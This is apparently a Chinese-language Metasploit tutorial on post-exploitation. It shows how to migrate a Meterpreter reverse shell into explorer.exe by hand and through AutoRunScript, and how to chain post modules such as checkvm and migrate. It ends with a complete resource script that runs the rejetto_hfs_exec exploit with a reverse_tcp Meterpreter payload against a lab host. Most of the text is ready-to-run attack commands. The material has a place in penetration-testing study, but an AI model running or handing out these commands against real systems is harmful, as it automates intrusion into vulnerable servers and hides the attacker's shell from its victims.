• 手动迁移

    在meterpreter中执行ps命令查看目标机器的进程,使用migrate这个命令将进程进行迁移,migrate的参数可以是pid也可以是进程的名称。我们将进程迁移到explorer.exe(任务管理器)中可以执行migrate 2228migrate -P 2228(pid根据实际情况而定),还可以执行migrate -N explorer.exe

    再次执行ps发现原始反弹shell的进程已经消失

  • 自动迁移

    指一反弹shell就自动执行进程迁移命令,在配置监听器的时候可以设置

    1
    2
    3
    set autorunscript migrate -N explorer.exe(指定进程)

    set autorunscript -f(默认迁移到notepad进程)
  • 我们可以通过输入set AutoRunScript [script-name]来设置AutoRunScript的选项,也可以在资源脚本中直接设置,后者一次性自动完成全部渗透操作和后渗透操作。

    通过使用multi_scriptmulti_console_command模块,AutoRunScript还可以一次性运行多个后渗透脚本。

    脚本内容:

    1
    2
    run post/windows/gather/checkvm
    run post/windows/manage/migrate

    脚本文件名为multi_script,我们将其保存到/root/my_scripts目录下。

    使用:

    1
    set AutoRunScript multi_console_command -rc /root/my_scripts/multi_script
  • 我们也可以将整个利用过程保存为脚本 名称为 resource_complete

    1
    2
    3
    4
    5
    6
    7
    8
    use exploit/windows/http/rejetto_hfs_exec
    set payload windows/meterpreter/reverse_tcp
    set RHOST 192.168.175.130
    set RPORT 8080
    set LHOST 192.168.175.128
    set LPORT 2222
    set AutoRunScript multi_console_command -rc /root/my_scripts/multi_script
    exploit

    直接运行 resource /root/my_scripts/resource_complete

    就可以自动完成渗透过程

    参考文章:渗透之——在Metasploit中使用AutoRunScript